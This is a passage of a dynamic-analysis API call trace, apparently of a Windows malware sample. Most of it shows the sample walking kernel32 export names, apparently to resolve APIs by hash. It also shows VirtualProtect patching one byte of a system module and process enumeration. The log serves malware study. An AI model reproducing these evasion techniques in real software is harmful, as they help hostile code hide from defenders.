lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0030.590] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0030.590] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0030.590] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0030.590] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0030.590] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0030.590] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0030.591] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0030.591] lstrcpyA (in: lpString1=0xc9ea74, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0030.591] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0030.591] lstrcpyA (in: lpString1=0xc9ea74, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0030.591] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0030.591] lstrcpyA (in: lpString1=0xc9ea74, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0030.591] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0030.591] lstrcpyA (in: lpString1=0xc9ea74, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0030.591] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0030.591] lstrcpyA (in: lpString1=0xc9ea74, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0030.591] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0030.591] lstrcpyA (in: lpString1=0xc9ea74, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0030.591] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0030.591] lstrcpyA (in: lpString1=0xc9ea74, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0030.591] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0030.591] lstrcpyA (in: lpString1=0xc9ea74, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0030.591] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0030.591] lstrcpyA (in: lpString1=0xc9ea74, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0030.591] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0030.591] lstrcpyA (in: lpString1=0xc9ea74, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0030.591] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0030.591] lstrcpyA (in: lpString1=0xc9ea74, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0030.591] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0030.591] lstrcpyA (in: lpString1=0xc9ea74, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0030.591] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0030.591] lstrcpyA (in: lpString1=0xc9ea74, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0030.591] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0030.591] lstrcpyA (in: lpString1=0xc9ea74, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0030.591] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0030.591] lstrcpyA (in: lpString1=0xc9ea74, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0030.591] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0030.591] lstrcpyA (in: lpString1=0xc9ea74, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0030.591] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0030.591] lstrcpyA (in: lpString1=0xc9ea74, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0030.593] VirtualProtect (in: lpAddress=0x771cf7ea, dwSize=0x1, flNewProtect=0x40, lpflOldProtect=0xc9f73c | out: lpflOldProtect=0xc9f73c*=0x20) returned 1 [0030.593] VirtualProtect (in: lpAddress=0x771cf7ea, dwSize=0x1, flNewProtect=0x20, lpflOldProtect=0xc9f740 | out: lpflOldProtect=0xc9f740*=0x40) returned 1 [0030.705] VirtualFree (lpAddress=0x100000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0030.705] VirtualFree (lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0030.708] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4c [0030.712] Process32FirstW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0030.713] Process32NextW (in: hSnapshot=0x4c, lppe=0xc9f550 | out: lppe=0xc9f550*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0030.713] GetLastError () returned 0x0 [0030.713] lstrlenA (lpString="kernel32.dll") returned 12 [0030.713] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0030.713] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0030.713] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0030.713] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0030.713] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0030.713] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0030.713] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0030.714] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0030.714] lstrlenA (lpString="ADDATOMA") returned 8 [0030.714] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0030.714] lstrlenA (lpString="ADDATOMW") returned 8 [0030.714] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0030.714] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0030.714] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0030.714] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0030.714] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0030.714] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0030.714] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0030.714] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0030.714] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0030.714] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0030.714] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0030.714] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0030.714] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0030.714] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0030.714] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0030.714] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0030.714] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0030.714] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0030.714] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0030.714] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0030.714] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0030.714] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0030.714] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0030.714] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0030.714] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0030.714] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0030.714] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0030.714] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0030.714] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0030.714] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0030.715] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0030.715] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0030.715] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0030.715] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0030.715] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0030.715] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0030.715] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0030.715] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0030.715] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0030.715] lstrlenA (lpString="BACKUPREAD") returned 10 [0030.715] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0030.715] lstrlenA (lpString="BACKUPSEEK") returned 10 [0030.715] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0030.715] lstrlenA (lpString="BACKUPWRITE") returned 11 [0030.715] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0030.715] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0030.715] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0030.715] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0030.715] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0030.715] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0030.715] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0030.715] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0030.715] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0030.715] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0030.715] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0030.715] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0030.715] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0030.715] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0030.715] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0030.715] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0030.715] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0030.715] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0030.715] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0030.715] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0030.715] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0030.716] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0030.716] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0030.716] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0030.716] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0030.716] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0030.716] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0030.716] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0030.716] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0030.716] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0030.716] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0030.716] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0030.716] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0030.716] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0030.716] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0030.716] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0030.716] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0030.716] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0030.716] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0030.716] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0030.716] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0030.716] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0030.716] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0030.716] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0030.716] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0030.716] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0030.716] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0030.716] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0030.716] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0030.716] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0030.716] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0030.716] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0030.716] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0030.716] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0030.717] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0030.717] lstrlenA (lpString="BEEP") returned 4 [0030.717] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0030.717] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0030.717] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0030.717] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0030.717] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0030.717] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0030.717] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0030.717] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0030.717] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0030.717] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0030.717] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0030.717] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0030.717] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0030.717] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0030.717] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0030.717] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0030.717] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0030.717] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0030.717] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0030.717] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0030.717] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0030.717] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0030.717] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0030.717] lstrlenA (lpString="CANCELIO") returned 8 [0030.717] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0030.717] lstrlenA (lpString="CANCELIOEX") returned 10 [0030.717] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0030.717] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0030.717] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0030.717] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0030.717] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0030.717] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0030.717] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0030.718] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0030.718] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0030.718] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0030.718] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0030.718] lstrlenA (lpString="CHECKELEVATION") returned 14 [0030.718] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0030.718] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0030.718] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0030.718] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0030.718] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0030.718] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0030.718] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0030.718] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0030.718] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0030.718] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0030.718] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0030.718] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0030.718] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0030.718] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0030.718] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0030.718] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0030.718] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0030.718] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0030.718] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0030.718] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0030.718] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0030.718] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0030.718] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0030.718] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0030.718] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0030.718] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0030.718] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0030.718] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0030.719] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0030.719] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0030.719] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0030.719] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0030.719] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0030.719] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0030.719] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0030.719] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0030.719] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0030.719] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0030.719] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0030.719] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0030.719] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0030.719] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0030.719] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") 